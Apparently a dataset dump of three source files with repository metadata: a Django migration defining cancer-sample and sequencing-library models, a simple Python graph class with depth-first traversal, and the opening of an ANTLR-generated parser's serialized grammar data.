] | 2 | 2018-10-03T16:05:14.000Z | 2019-03-08T23:01:29.000Z | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
] | 3 | 2019-05-09T22:48:22.000Z | 2020-06-05T18:52:05.000Z | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
] | 4 | 2018-08-16T22:25:10.000Z | 2021-02-19T16:10:15.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-07-12 18:40
from __future__ import unicode_literals
import core.helpers
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AdditionalSampleInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegionMetadata',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='HistoricalAdditionalSampleInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical additional sample information',
'db_table': 'additional_sample_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegion',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region',
'db_table': 'chip_region_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegionMetadata',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region metadata',
'db_table': 'chip_region_metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalJiraUser',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical jira user',
'db_table': 'jira_user_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalMetadataField',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical metadata field',
'db_table': 'metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSample',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sample',
'db_table': 'history_sample',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSublibraryInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sublibrary information',
'db_table': 'sub_library_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='JiraUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MetadataField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
options={
'ordering': ['name'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='Sample',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
],
options={
'ordering': ['sample_id'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='SublibraryInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('chip_region', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.ChipRegion', verbose_name='Chip_Region')),
],
bases=(models.Model, core.helpers.FieldValue),
),
]
| 76.571875 | 317 | 0.611762 | 24,262 | 0.990164 | 0 | 0 | 0 | 0 | 0 | 0 | 6,668 | 0.27213 |
e2e418de55f43f1db45de7f6ba6f8897b7cdff7d | 2,205 | py | Python | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | class Vertex:
'''This class will create Vertex of Graph, include methods
add neighbours(v) and rem_neighbor(v)'''
def __init__(self, n): # To initiate instance Graph Vertex
self.name = n
self.neighbors = list()
self.color = 'black'
def add_neighbor(self, v): # To add neighbour in graph
if v not in self.neighbors:
self.neighbors.append(v)
self.neighbors.sort()
def rem_neighbor(self, v): # To remove neighbor in graph
if v in self.neighbors:
self.neighbors.remove(v)
class Graph:
'''This Graph Class will implement Graph using adjacency list include
methods add vertex, add edge and dfs triversal that print Vertax label using
adjacency list '''
vertices = {} # create directory
def add_vertex(self, vertex): # To add vertex
if isinstance(vertex, Vertex) and vertex.name not in self.vertices:
self.vertices[vertex.name] = vertex
return True
else:
return False
def add_edge(self, src, dst): # To add Edges
if src in self.vertices and dst in self.vertices:
for key, value in self.vertices.items():
if key == src:
value.add_neighbor(dst)
if key == dst:
value.add_neighbor(src)
return True
else:
return False
def rem_edge(self, src, dst): # To remove Edges
if src in self.vertices and dst in self.vertices:
self.vertices[src].rem_neighbor(dst)
self.vertices[dst].rem_neighbor(src)
print("Edges removed from {} to {}".format(src, dst))
return True
else:
return False
def dfs(self, vertex): # dfs Triversal
vertex.color = 'blue'
for v in vertex.neighbors:
if self.vertices[v].color == 'black':
self.dfs(self.vertices[v])
vertex.color = 'blue'
if vertex.color == 'blue':
for key in sorted(list(self.vertices.keys())):
print(key + str(self.vertices[key].neighbors))
| 35.564516 | 81 | 0.563719 | 2,197 | 0.996372 | 0 | 0 | 0 | 0 | 0 | 0 | 518 | 0.234921 |
e2e456ab2aaa5fdcc808e3cfb4ffe47c48124124 | 213,896 | py | Python | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 4 | 2019-05-09T20:40:52.000Z | 2021-05-08T07:17:43.000Z | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 8 | 2020-07-05T12:41:31.000Z | 2020-12-27T06:40:39.000Z | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 1 | 2020-07-05T11:51:02.000Z | 2020-07-05T11:51:02.000Z | # encoding: utf-8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3@")
buf.write("\u027b\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
buf.write("\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t")
buf.write(";\4<\t<\4=\t=\4>\t>\3\2\7\2~\n\2\f\2\16\2\u0081\13\2\3")
buf.write("\2\3\2\3\2\3\2\7\2\u0087\n\2\f\2\16\2\u008a\13\2\3\2\3")
buf.write("\2\7\2\u008e\n\2\f\2\16\2\u0091\13\2\3\2\3\2\3\3\3\3\3")
buf.write("\3\3\3\3\3\5\3\u009a\n\3\3\4\3\4\3\4\3\4\3\4\5\4\u00a1")
buf.write("\n\4\3\5\3\5\3\5\3\5\7\5\u00a7\n\5\f\5\16\5\u00aa\13\5")
buf.write("\3\5\3\5\3\6\3\6\3\6\3\6\3\7\3\7\3\7\7\7\u00b5\n\7\f\7")
buf.write("\16\7\u00b8\13\7\3\7\3\7\3\7\5\7\u00bd\n\7\3\b\3\b\3\b")
buf.write("\3\b\7\b\u00c3\n\b\f\b\16\b\u00c6\13\b\3\b\3\b\3\t\3\t")
buf.write("\3\n\3\n\5\n\u00ce\n\n\3\n\3\n\3\13\3\13\5\13\u00d4\n")
buf.write("\13\3\13\3\13\3\f\3\f\3\f\7\f\u00db\n\f\f\f\16\f\u00de")
buf.write("\13\f\3\f\5\f\u00e1\n\f\3\r\3\r\3\r\3\r\5\r\u00e7\n\r")
buf.write("\3\r\3\r\3\r\3\16\3\16\3\16\5\16\u00ef\n\16\3\17\3\17")
buf.write("\7\17\u00f3\n\17\f\17\16\17\u00f6\13\17\3\17\3\17\3\20")
buf.write("\3\20\7\20\u00fc\n\20\f\20\16\20\u00ff\13\20\3\20\3\20")
buf.write("\3\21\3\21\3\21\3\21\7\21\u0107\n\21\f\21\16\21\u010a")
buf.write("\13\21\3\22\7\22\u010d\n\22\f\22\16\22\u0110\13\22\3\23")
buf.write("\7\23\u0113\n\23\f\23\16\23\u0116\13\23\3\23\3\23\5\23")
buf.write("\u011a\n\23\3\24\7\24\u011d\n\24\f\24\16\24\u0120\13\24")
buf.write("\3\24\5\24\u0123\n\24\3\24\3\24\5\24\u0127\n\24\3\24\5")
buf.write("\24\u012a\n\24\3\24\5\24\u012d\n\24\3\24\5\24\u0130\n")
buf.write("\24\3\24\7\24\u0133\n\24\f\24\16\24\u0136\13\24\3\24\3")
buf.write("\24\3\24\3\24\3\24\3\25\7\25\u013e\n\25\f\25\16\25\u0141")
buf.write("\13\25\3\25\5\25\u0144\n\25\3\26\3\26\3\26\3\26\3\27\3")
buf.write("\27\3\27\3\30\3\30\5\30\u014f\n\30\3\31\3\31\3\31\3\32")
buf.write("\3\32\3\32\3\32\7\32\u0158\n\32\f\32\16\32\u015b\13\32")
buf.write("\3\33\3\33\3\33\3\34\3\34\3\34\3\34\3\35\6\35\u0165\n")
buf.write("\35\r\35\16\35\u0166\3\36\3\36\3\37\3\37\3 \3 \3 \7 \u0170")
buf.write("\n \f \16 \u0173\13 \3!\3!\3!\5!\u0178\n!\3\"\7\"\u017b")
buf.write("\n\"\f\"\16\"\u017e\13\"\3\"\5\"\u0181\n\"\3\"\3\"\3\"")
buf.write("\3\"\3\"\3#\3#\3$\3$\3$\7$\u018d\n$\f$\16$\u0190\13$\3")
buf.write("%\3%\5%\u0194\n%\3%\5%\u0197\n%\3&\6&\u019a\n&\r&\16&")
buf.write("\u019b\3\'\3\'\5\'\u01a0\n\'\3\'\3\'\5\'\u01a4\n\'\3\'")
buf.write("\3\'\5\'\u01a8\n\'\3\'\3\'\5\'\u01ac\n\'\5\'\u01ae\n\'")
buf.write("\3(\3(\3(\3(\5(\u01b4\n(\3)\3)\3)\3)\3*\3*\3*\3*\7*\u01be")
buf.write("\n*\f*\16*\u01c1\13*\3+\3+\3+\3+\3+\3+\5+\u01c9\n+\3,")
buf.write("\3,\5,\u01cd\n,\3-\3-\5-\u01d1\n-\3.\3.\3.\7.\u01d6\n")
buf.write(".\f.\16.\u01d9\13.\3/\5/\u01dc\n/\3/\6/\u01df\n/\r/\16")
buf.write("/\u01e0\3/\5/\u01e4\n/\3\60\3\60\5\60\u01e8\n\60\3\60")
buf.write("\3\60\5\60\u01ec\n\60\3\60\3\60\5\60\u01f0\n\60\3\60\3")
buf.write("\60\5\60\u01f4\n\60\3\60\5\60\u01f7\n\60\3\61\3\61\3\61")
buf.write("\3\61\5\61\u01fd\n\61\3\62\3\62\5\62\u0201\n\62\3\62\3")
buf.write("\62\5\62\u0205\n\62\3\62\3\62\5\62\u0209\n\62\5\62\u020b")
buf.write("\n\62\3\63\3\63\3\63\3\63\3\63\3\63\5\63\u0213\n\63\3")
buf.write("\63\5\63\u0216\n\63\3\64\3\64\3\64\3\64\3\64\5\64\u021d")
buf.write("\n\64\5\64\u021f\n\64\3\65\3\65\3\65\3\65\5\65\u0225\n")
buf.write("\65\3\66\3\66\3\66\3\66\7\66\u022b\n\66\f\66\16\66\u022e")
buf.write("\13\66\3\66\3\66\3\67\3\67\5\67\u0234\n\67\3\67\3\67\5")
buf.write("\67\u0238\n\67\3\67\3\67\5\67\u023c\n\67\38\38\58\u0240")
buf.write("\n8\38\78\u0243\n8\f8\168\u0246\138\38\58\u0249\n8\38")
buf.write("\38\38\39\39\59\u0250\n9\39\59\u0253\n9\3:\3:\3:\3:\3")
buf.write(";\3;\5;\u025b\n;\3;\3;\5;\u025f\n;\5;\u0261\n;\3<\3<\3")
buf.write("<\3<\7<\u0267\n<\f<\16<\u026a\13<\3<\3<\3=\3=\3=\3=\3")
buf.write("=\5=\u0273\n=\5=\u0275\n=\3>\3>\5>\u0279\n>\3>\2\2?\2")
buf.write("\4\6\b\n\f\16\20\22\24\26\30\32\34\36 \"$&(*,.\60\62\64")
buf.write("\668:<>@BDFHJLNPRTVXZ\\^`bdfhjlnprtvxz\2\4\4\2\23\23\27")
buf.write("\31\4\2++..\2\u02a8\2\177\3\2\2\2\4\u0099\3\2\2\2\6\u00a0")
buf.write("\3\2\2\2\b\u00a2\3\2\2\2\n\u00ad\3\2\2\2\f\u00bc\3\2\2")
buf.write("\2\16\u00be\3\2\2\2\20\u00c9\3\2\2\2\22\u00cb\3\2\2\2")
buf.write("\24\u00d1\3\2\2\2\26\u00d7\3\2\2\2\30\u00e2\3\2\2\2\32")
buf.write("\u00ee\3\2\2\2\34\u00f0\3\2\2\2\36\u00f9\3\2\2\2 \u0102")
buf.write("\3\2\2\2\"\u010e\3\2\2\2$\u0114\3\2\2\2&\u011e\3\2\2\2")
buf.write("(\u013f\3\2\2\2*\u0145\3\2\2\2,\u0149\3\2\2\2.\u014e\3")
buf.write("\2\2\2\60\u0150\3\2\2\2\62\u0153\3\2\2\2\64\u015c\3\2")
buf.write("\2\2\66\u015f\3\2\2\28\u0164\3\2\2\2:\u0168\3\2\2\2<\u016a")
buf.write("\3\2\2\2>\u016c\3\2\2\2@\u0174\3\2\2\2B\u017c\3\2\2\2")
buf.write("D\u0187\3\2\2\2F\u0189\3\2\2\2H\u0196\3\2\2\2J\u0199\3")
buf.write("\2\2\2L\u01ad\3\2\2\2N\u01af\3\2\2\2P\u01b5\3\2\2\2R\u01b9")
buf.write("\3\2\2\2T\u01c8\3\2\2\2V\u01cc\3\2\2\2X\u01d0\3\2\2\2")
buf.write("Z\u01d2\3\2\2\2\\\u01e3\3\2\2\2^\u01f6\3\2\2\2`\u01f8")
buf.write("\3\2\2\2b\u020a\3\2\2\2d\u0215\3\2\2\2f\u021e\3\2\2\2")
buf.write("h\u0224\3\2\2\2j\u0226\3\2\2\2l\u023b\3\2\2\2n\u023d\3")
buf.write("\2\2\2p\u024d\3\2\2\2r\u0254\3\2\2\2t\u0260\3\2\2\2v\u0262")
